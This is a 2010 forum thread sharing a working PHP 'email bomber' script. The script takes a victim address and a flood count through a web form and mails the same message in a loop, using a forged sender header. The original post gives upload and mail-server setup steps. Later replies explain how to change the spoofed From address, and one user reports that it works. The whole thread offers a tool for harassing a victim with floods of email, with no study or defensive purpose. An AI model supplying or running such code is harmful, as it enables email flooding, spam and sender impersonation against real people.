Post: PHP Bomber Script
01-03-2010, 05:19 PM #1
bmxdude9
Million Miles Of Fun!
(adsbygoogle = window.adsbygoogle || []).push({}); Enjoy and please DO NOT use on NGU members. Smile^

Originally posted by another user

Lol you know its MUCH better to write it in PHP or C++? And for everyone who wants it, upload this to a host or your own host(such as your IIS server)


Save as something like ebomb.php, upload it to your host(or your own server such as WAMP or IIS, that is if you have one) have it placed in a dir(or public_HTML) and go to..

You must login or register to view this content.

You also must have mail server

Then enter the information and send Smile

    
<?
//Disable error reporting
error_reporting(E_ALL & ~E_NOTICE);

//Information to send
$vic = $_POST['vic'];
$subject = $_POST['subject'];
$msg = $_POST['msg'];
$headers = "From: /b/@anonymous.com";
$flood = $_POST['flood'];
$loop = 1;

//If information filled out spam!
if(isset($vic)) {
//Creates loop to keep mailing
while($loop <= $flood) {
mail($vic, $subject, $msg, $headers); //Mails the information
echo "Flooded ".$loop."x<br>"; //Displays how many emails sent
$loop++; //loops
}
}
else { //If info isn't filled out take them to fill out form!
?>
<form method="post">
Victim:<br />
<input type="text" name="vic"><br /><br />
Subject:<br />
<input type="text" name="subject"><br /><br />
How many Times to flood:<br />
<input type="text" name="flood"><br /><br />
Message:<br />
<input type="text" name="msg"><br />
<br />
<input type="submit" value="Spam!">
</form>
<? } ?>
(adsbygoogle = window.adsbygoogle || []).push({});

The following user thanked bmxdude9 for this useful post:

01-03-2010, 05:46 PM #2
DeLeTeD
Maggbot timeout!
they have to have mail server on and php 4
01-03-2010, 05:52 PM #3
bmxdude9
Million Miles Of Fun!
Originally posted by .DeLeTeD. View Post
they have to have mail server on and php 4


well I mentioned they need it on a server(such as WAMP, which already has PHP) and most hosts offer php but yeah I sorta forgot about the mail server, Ill add that.
01-14-2010, 08:48 PM #4
Is there anyway you can make a fake sender email up so when it says who it is send from you can say its send from [email][email protected][/email]
:confused:
01-14-2010, 08:56 PM #5
bmxdude9
Million Miles Of Fun!
Originally posted by hackerxide View Post
Is there anyway you can make a fake sender email up so when it says who it is send from you can say its send from [email][email protected][/email]
:confused:


Edit this value under the "Information to Send" Just put whatever email you want and it should work out for you.

$headers = "From: /b/@anonymous.com";
01-14-2010, 08:59 PM #6
Originally posted by bmxdude9 View Post
Edit this value under the "Information to Send" Just put whatever email you want and it should work out for you.

$headers = "From: /b/@anonymous.com";


Yea lol I just was doing that It works like a charm too! Ill Rep

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo